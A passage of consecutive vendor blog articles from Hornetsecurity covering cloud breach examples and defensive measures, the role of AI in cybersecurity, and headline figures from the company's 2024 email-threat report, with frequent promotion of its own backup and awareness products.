This attack affected almost 23,000 MongoDB databases.

Another misconfigured AWS cloud service, the Amazon S3 (Simple Storage Services) bucket, led to the breach of nearly 200 million U.S. voters. The same company that discovered the exploit, UpGuard, also discovered another one affecting the breach of 6 million Verizon customers. The root cause was the same; misconfigured AWS S3 bucket.

Furthermore, a group of security researchers discovered vulnerabilities with Elasticsearch and Elastic Cloud Enterprise. The vulnerability existed due to not properly controlling the consumption of internal resources. A remote attacker could send a specially crafted HTTP request that causes an OutofMemory error and thus perform a denial of service (Dos) attack.

In recent years, major cloud providers such as Google and AWS experienced DDoS attacks in 2020, GitHub in 2017, and Cloudflare in 2014, among others. Some of them were mitigated due to implemented DDoS protection.

The last one I would like to mention here is the WannaCry ransomware that occurred in 2017. It targeted on-premises Windows machines, but also Windows machines hosted in the cloud. When WannaCry got into Windows, it encrypted data and demanded payment to decrypt them.

As you can gather from these examples, the lack of poor security and misconfiguration leads to breaches.

Security Strategies for Protecting Against Cloud Malware

There are several security measures you can use in your organization to avoid cloud cyber-attacks. They all fall into strong IT Security.

Security Strategies for Protecting Against Cloud Malware

Use strong passwords, and 2FA (two-factor authentication). If you are an IT Admin you should enforce password policies such as password strength, password history, frequency of password reuse, password age, and others. On top of that, you should implement two-factor authentication and password-less authentication.

Keep your cloud systems patched. Public cloud providers such as AWS, Microsoft, and Google provide you with virtual machines or databases, however, it is your responsibility to keep them fully patched along with installed software. You can implement centralized update and reporting solutions that do it for you.

We highly recommend you take a backup of your machines, data, and databases. Ensure that your files are backed in different locations and that are protected from ransomware. Hornesecurity’s VM backup supports immutable backup which prevents ransomware or any other malware from making any changes to backup files. Read more in The Backup Bible.

Disable unused ports and protocols. If you are running an EC2 instance, web application, or other cloud service, and you don’t need certain protocols, such as SSH, or RDP, disable them. Many cloud attacks are being carried out through protocols that weren’t even in use.

According to a Palo Alto security report released in 2020, 43% of public cloud databases were unencrypted. These databases are potential attack vendors along with their data. Ensure your databases and data are encrypted, and make sure to implement good key management so that potential attackers can’t access the keys.

Monitoring and logging help you to stay proactive and detect potential issues before they become critical problems for your business. Implementing proper NMS (Network monitoring solution) and SIEM (Security information and event management) is a must-have.

Use secured API. You should ensure that your developers follow security practices when developing API and that they rely on a standard API framework designed with security in mind.

Implement security protection such as Cloud Access Security Broker (CASB), DAM (Database Activity Monitoring), FAM (File Access Monitoring), DLP (Data Loss Prevention), and others.

Perform penetration testing and vulnerability analysis of your cloud services or applications. This helps you to be proactive and strengthen your cloud security.

Educating employees is one of the most important preventive measures you can take. It starts at the IT level and is distributed to developers, pre-sales, technical support, and any users who might have access to your infrastructure. Employees should be educated about IT security, phishing cloud attacks, scams (e.g. QR code scams), and others.

Using Security Platforms like Hornetsecurity to Mitigate Against Cloud Malware

Hornetsecurity is an all-in-one protection solution covering security, backup, compliance, and security awareness for your employees.

Hornetsecurity VM Backup is a backup solution that helps you back up your virtual machines and data to a safe location. One of the latest features released in version 9 is immutable backup. An immutable backup adds an extra security layer to your backup copies by preventing ransomware cloud attacks.

VM Backup helps you to back up your data to on-premises and cloud including Amazon S3, Wasabi, and Azure.

VM Backup – free of charge for 30 days – and convince yourself of all the features now!

You can learn more about it and trial it here VM Backup.

We mentioned how important is to educate your employees on the latest cyber threats. We provide you with fully automated spear-phishing simulation and cybersecurity training for employees through our Security Awareness Service. According to the Global Risk Report from 2022, 95% of all cyber security incidents are caused by human error.

Security Awareness Service provides you with intelligent awareness benchmarking that measures employee security awareness. It also helps you to roll out the relevant e-learning content tailored to individual roles and simulate different phishing cloud attacks.

Spear Phishing Engine

We are proud to say that Hornetsecurity’s Security Awareness Service is an award-winning security service.

If you are using Microsoft 365, then you need additional protection through our 365 Total Protection Compliance & Awareness.

It is the next-generation Microsoft security and compliance management solution that offers email security, backup and recovery, compliance and permission management, security awareness, and AI recipient validation. You can explore our plans here.

Furthermore, we provide you with an in-depth analysis of the Microsoft 365 Threat Landscape in our Cyber Security Report 2024. Also, we recommend you take a closer look at the biggest findings of the report.

To properly protect your cyber environment, use Hornetsecurity Advanced Threat Protection, Security Awareness Service, and VM backup to secure your critical data.

We work hard perpetually to give our customers confidence in their Spam & Malware Protection, Email Encryption, and Email Archiving strategies.

To keep up to date with the latest articles and practices, pay a visit to our Hornetsecurity blog now.


In some ways, securing your cloud workloads is different than securing on-premises infrastructure, particularly as it’s a shared responsibility, but in many ways, the same approaches we use on-premises are applicable to any IT environment.

As you’ve learnt in this article, paying attention to basic security hygiene and fostering a security culture in your organization is a crucial first step.


How do I stop cloud attacks?

Cloud attacks can be stopped by implementing preventive security measures, often called cyber security hygiene. That includes using strong authentication, implementing strong access control, encrypting data and databases, patching systems, disabling unused ports, educating employees and others.

On top of that, implementing strong infrastructure security solutions such as firewalls, threat detection and response is must-have.

How do you detect cloud attacks?

Cloud attacks can be detected using different preventive security tools such as cloud monitoring and logging. There are different types of these tools and all of them aim to help you to identify and notify your Team before a small issue turns into a major incident.

On top of that, you should follow different cybersecurity channels that provide insights into ongoing cybersecurity news.

What is a cloud threat?

Cloud threat is security risk or vulnerability that can compromise data or services hosted in the cloud. It can be spread via different forms such as malware, ransomware, MITM attacks, DoS and DDoS, unsecured API, insider threats, misconfiguration and lack of cybersecurity awareness.

What are the trends for cloud attacks?

Cloud and cybersecurity challenges are continuously evolving. One of the top trends how attackers get into our systems are via phishing, social engineering, misconfiguration, API attacks, lack of active and tested backups, and others.

How Artificial Intelligence (AI) is Changing Cybersecurity

How Artificial Intelligence (AI) is Changing Cybersecurity

Traditional security systems can’t keep pace with the increased number of cyber threat activities.

The amount of data that is being generated is large and complex. According to the Data Never Sleeps 4.0 report 2016, over 18 TB of data is generated every minute. Today, that number is even higher.

We can’t analyze this amount of data by ourselves. We need help. We need Artificial Intelligence (AI).

This article is about Artificial Intelligence (AI) for cybersecurity, understanding the basics, advantages and disadvantages, use cases and real-world scenarios, and some predictions of how the future of cybersecurity with AI will look.

Artificial Intelligence (AI)

Artificial intelligence is a set of technologies that can learn from provided data and draw conclusions or decisions. AI can’t work alone, it requires data. Depending on the data that is being used, AI can make right or wrong decisions.

It is used in different industries, from the auto industry, and medicine, to technology. AI works in three ways:

  1. Assisted intelligence
  2. Augmented intelligence
  3. Autonomous intelligence

It consists of four subsets including:

  1. Machine Learning
  2. Deep Learning
  3. Neural Networks
  4. Expert Systems

i.e., it encompasses a range of techniques and approaches, each with its own variations.

Subsets of Artificial intelligence (AI) for cybersecurity

Machine Learning (ML) uses statistical techniques to learn from the data. It works better with single tasks than comprehensive missions. Some of the use cases of machine learning are product recommendations in e-commerce shops, image recognition, virtual personal assistants, and others.

Deep Learning (DL) is a subset of machine learning that helps analyze complex data and draw conclusions based on them. For example, Alexa or Siri uses deep learning to understand your speech and language when you speak to them.

Neural Networks teach computers to process data in a way similar to how our brains do. They consist of large amounts of connected nodes that are trained to recognize patterns in input data. Neural networks are used in combination with deep learning in voice and image recognition, language translation, and others.

An Expert System is a computer system that mimics specific human behavior in a particular field. Some examples of expert systems are the Intelligent Tutoring System (ITS), Cancer Decision Support Tool (CaDet), Knowledge-Based Expert System, and others.

Applying AI to cybersecurity means analyzing data from security incidents, learning from it, and then applying the solution to a new attack to prevent it.

Artificial Intelligence vs. Data Analytics

Even though they are related, artificial intelligence (AI) for cybersecurity and data analytics (DA) are two distinct fields. They differentiate in the way they work with the data.

Artificial intelligence’s (AI) primary role is to replicate human-like cognitive behavior. AI uses machine learning, natural language processing, computer vision, robotics, and data analysis to improve itself. It continuously analyses data and learns from it. It is dynamic and iterative.

On the other hand, Data analytics (DA) is static, it uses statistical techniques to identify trends, collaboration, and patterns in data. Data analytics predicts patterns based on historical data to foresee future events. Data analytics is not iterative or self-learning like AI.

Artificial Intelligence and Data Analytics do not complete with each other, they complement each other.

Advantages & Downsides of AI in Cybersecurity

Everything has pros and cons, including AI. AI is already used in cybersecurity and here are some things we have learnt.

Some of the benefits of using AI-powered security systems are real-time threat detection and predictive analysis, anomaly detection, automation and orchestration of repetitive tasks, better end-point protection, AI-enabled authentication, and improved and enhanced threat detection and response.

Advantages of AI

All of these enhancements work based on the established baseline through repeated training processes. AI assists us in becoming more proactive and staying safer than we were previously.

Everything sounds perfect; is there any downside to using AI in cybersecurity? Well, yes, there is.

Malicious cybersecurity professionals can misuse AI and teach it how to take actions that are in their favor. This is called Adversarial AI attacks. That is a type of attack where the attacker manipulates a machine-learning model by making minor changes to the input data.

Adversarial AI-attack

An attacker can manipulate the system using image and text classification and malware evasion. This hurts autonomous vehicles, medical imaging, and security systems. Google, Amazon, Microsoft, and Tesla have faced adversarial attacks in the past.

Did you hear about AI-enabled botnets? AI can be used to create botnets that can coordinate attacks, execute DDoS attacks, and credential stuffing. They are intelligent and can adapt their behavior based on changes in the environment and avoid detection.

AI learns from human behavior and mimics or replicates it. What if the actions are based on biased and flawed data? This can lead to wrong actions. One way to handle this properly is by having experienced cybersecurity professionals on our teams.

AI works with a large amount of data, and very often involves personal and sensitive data. This raises privacy concerns and breaches. We need to ensure that our data is fully secured against any breaches. We don’t want malicious people to get our AI model in their hands.

Best Practices for Implementing AI in Security

AI is a powerful tool in our hands, and to achieve its purpose, it should follow the best practices.

Firstly, you should choose the right machine learning or deep learning models that meet your security objective.

Secondly, it is about data quality. AI draws conclusions and actions based on the provided data through the repetitive training process. If data are flawed, it means AI actions will make flawed decisions. That can cause more trouble than benefits. Data should be high-quality reflecting real-world conditions.

Implement a mechanism that minimizes or avoids false positive conclusions and alarms. The primary purpose of AI in security is to predict real threats.

Since representative data is sensitive, you should ensure data is stored in a secured location and encryption and access control are in place.

Additionally, your data collection and storage need to comply with policy regulations such as GDPR (General Data Protection Regulation), HIPAA (Health Insurance Portability and Accountability Act), and others.

Even if the AI model complies with policy regulations, you should ensure you regularly perform auditing.

Furthermore, even if high-quality data are used to train AI models, AI models should be regularly tested and updated to meet the latest trends. This is a crucial step since cybersecurity threats are evolving while you are reading this blog article.

There are more practices such as integration of AI model with threat intelligence, explainability and transparency of AI decisions, scalability, redundancy and resilience, collaboration with security professionals, and others.

Use Cases of Artificial Intelligence in Cybersecurity

There are numerous use cases where we can take leverage of AI in cybersecurity. We will name a few and share with you some real-world examples.

In general, AI helps to detect unusual patterns and behavior that may indicate security threats. It does it through anomaly detection, behavior, and predictive analysis.

Furthermore, based on the established baseline and repetitive training process, it can detect unknown malware and malicious user actions (e.g. QA code scams) based on their behavior.

It does detect phishing emails and fraud detection in real-time by preventing them immediately and learning from their behavior.

Today, we can see AI implemented in IDS (Intrusion Detection System) and IPS (Intrusion Prevention System), network and endpoint security, SIEM (Security Information and Event Management), security automation and orchestration, vulnerability and patch management, DLP (Data Loss Prevention) and more.

AI is used by vendors who offer security protection such as Microsoft, Google, AWS, Fortigate, Palo Alto, Hornetsecurity, and others.

In March 2023, Microsoft introduced Microsoft Security Copilot powered by AI. It uses AI to detect threats, manage incidents, and improve security. Microsoft also integrated AI with other security products such as Microsoft Defender for Endpoints. It uses AI-adaptive protection which identifies devices at risk and blocks them accordingly.

IBM uses an AI model in their IBM Security QRadar SIEM solution. IBM Security QRadar SIEM in combination with AI helps you to analyze, detect, and prevent cybersecurity threats faster and automate tasks.

Fortinet provides AI-driven SOC. Their portfolio provides advanced threat detection and response, centralized monitoring, and automation through Fortinet devices. It reduces endpoint security risks through early detection and prevention.

Hornetsecurity uses AI to validate email recipients. Here is what it says in the document: “AI Recipient Validation is an AI-based, self-learning service that continuously analyzes a user’s email communication patterns in the background. It automatically detects potentially unintended recipients, warns about emails containing sensitive data like Personal Identifiable Information or inappropriate wording, and factors in user behavior and responses to automatically adjust warnings and suggestions issued in upcoming communications.”

AI Recipient Validation product diagram v2 AIRV Functional Graphic

While we are discussing IT Security, I would like to take this opportunity to share in-depth insights about different cybersecurity threats in our Cyber Security Report and Ransomware attacks survey.

The Future of AI in Cybersecurity

In the future, AI will be adopted as a standard in the cybersecurity industry, just like in many other areas. With just traditional security tools and humans, we can’t and won’t be able to follow evolving cybersecurity threats. 

It is promising, but also challenging what AI will bring to the table. It will be smarter based on the huge amount of data that will be generated until then. Based on some cybersecurity vendors, AI might be able to respond to its action by shutting down the affected machine, isolation the affected machine from the network, and apply countermeasure response to the source of the attack.

We see more and more IoT, IIoT, and OT integrated into traditional infrastructure. This will have security implications and AI will be needed to make the right cognitive decision and prevent attacks.

Everything we named as a use case in the previous section will be enhanced and better.

AI has the potential to improve cybersecurity and make our data safer. 

What the future brings with more AI we don’t know, but it might have an impact on the job market. It also brings ethical and data privacy concerns and more adversarial attacks.

To properly protect your cyber environment, use Hornetsecurity Security Awareness Service to train your employees to become aware of AI threats and assist in securing your critical data.

To keep up to date with the latest articles and practices, pay a visit to our Hornetsecurity blog now.


AI is already used in many cybersecurity tools and services and will have an even larger role to play in the future. Adversaries are also adopting AI to automate and improve their attacks.

In this article you learnt about the different ways AI can be used, both for attack and defense, and it’ll be an important evolution to keep an eye on for the cybersecurity field.


How is AI used in cyber security?

Artificial intelligence’s (AI) primary role is to replicate human-like cognitive behavior. Ai is used in cybersecurity for real-time threat detection, behavior and prediction analysis, anomaly detection based on the established baseline, automation and orchestration of repetitive tasks, better end-point protection automation and more.

Can we use AI in cyber security?

Yes, we can. AI is already used in cybersecurity to enhance threat detection and predictive analysis. It analyses data and makes decisions based on it.

What types of AI are used in cyber security?

AI uses machine learning, deep learning, neural networks and expert systems. They work together to learn from data, make better decisions and protect our digital assets.

The Biggest Findings in Hornetsecurity’s Cyber Security Report 2024

The Biggest Findings in Hornetsecurity’s Cyber Security Report 2024

Our yearly Cyber Security Report is here – download it free here.

This year we’ve analyzed over 45 billion emails and sliced and diced this data, and compared it with last year’s report to provide actionable insights for anyone who wants to protect their business against cyber threats.

We encourage you to download the full report which has a lot more important data, but in this article, we’ll cover the biggest findings in the report.

There Are a Lot of Junk Emails

Out of that pile of 45 billion emails, 36.4% was categorized as unwanted. Think about that – more than one in every three emails in ALL email we looked at wasn’t something the recipient wanted. Out of that portion, 96.4% were spam or rejected outright (never analyzed further as we knew it was coming from a bad sender). The remaining portion of just over 3.6% was categorized as malicious.

These malicious emails come in various flavors, with phishing remaining in the top spot at 43.3% (a 4%  increase from last year). The second flavor was malicious URLs at 30.5%, which is an 18%  increase over last year.

There’s a Lot of Junk Attached to Those Junk Emails

The most prevalent type of malicious email attachment are HTML files at 37.1%, followed by PDFs at 23.3% and then archive files (ZIP etc.) at 20.8%. The previous year’s usage of DOCX and XLSX files has dropped since Microsoft disable macros by default in Office.

HTML files will continue to be popular, as every mail client and OS knows how to handle this web standard format.

Industry Targeting

Both in last year’s report, and in this year’s, we found that attackers don’t have a strong preference for one industry vertical over another. In essence, if you can pay a ransom, you’re a target.

However, we did find three sectors that were overrepresented: Research, Entertainment and Manufacturing. It makes sense, Research often handles sensitive intellectual property, which increases the likelihood of a payday, and the same can be said for Manufacturing.

They’re also often seen as a soft target as they have a lot of insecure IoT and OT devices on their networks which can be used as springboards for compromise. Finally, Entertainment seems like a good target as they often handle large amounts of money, see the recent MGM and Caesar breaches as examples.

Brand Impersonation

A very popular type of technique in email attacks is impersonating trusted brands to increase the likelihood of a click. Our top 10 list includes DHL, Amazon, LinkedIn, Microsoft, FedEx and Netflix.


The full report, which is free, covers so much more than this quick taster, we analyze major breaches and trends in the Microsoft 365 space over the last 12 months and we make predictions on what cyber security trends we’ll see in the next 12 months.

We’ve also got a section on the best strategy for you to protect your organization, a section on vendor overdependence as a strategic risk and much more. Read the full Cyber Security Report.